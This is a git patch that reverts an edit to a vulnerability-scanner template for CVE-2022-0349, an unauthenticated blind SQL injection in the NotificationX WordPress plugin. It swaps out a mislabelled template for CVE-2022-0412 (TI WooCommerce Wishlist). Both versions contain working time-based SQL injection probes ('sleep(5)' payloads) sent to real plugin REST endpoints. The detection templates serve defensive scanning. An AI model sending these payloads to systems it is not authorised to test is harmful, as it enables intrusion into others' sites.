From 1baf1e9f045082323cf755ed83a720c861d43219 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 4 Oct 2022 14:28:45 +0530 Subject: [PATCH] Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. --- cves/2022/CVE-2022-0349.yaml | 35 ++++++++++++++++------------------- 1 file changed, 16 insertions(+), 19 deletions(-) diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index eca8421488..462bd2f525 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -1,25 +1,27 @@ -id: CVE-2022-0412 +id: CVE-2022-0349 info: - name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection + name: NotificationX WordPress plugin < 2.3.9 - SQL Injection author: edoardottt severity: critical description: | - The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks. + The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. reference: - - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682 - - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0412 + - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 classification: - cve-id: CVE-2022-0412 - metadata: - verified: true - tags: cve,cve2022,woocommerce,wordpress,wp-plugin,wp,sqli + cve-id: CVE-2022-0349 + tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022 requests: - - method: GET - path: - - "{{BaseURL}}/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g" + - raw: + - | + POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nx_id%3Dsleep(5)%20--%20x matchers-condition: and matchers: @@ -27,11 +29,6 @@ requests: dsl: - 'duration>=5' - - type: word - part: body - words: - - 'Product not found' - - type: status status: - - 400 + - 200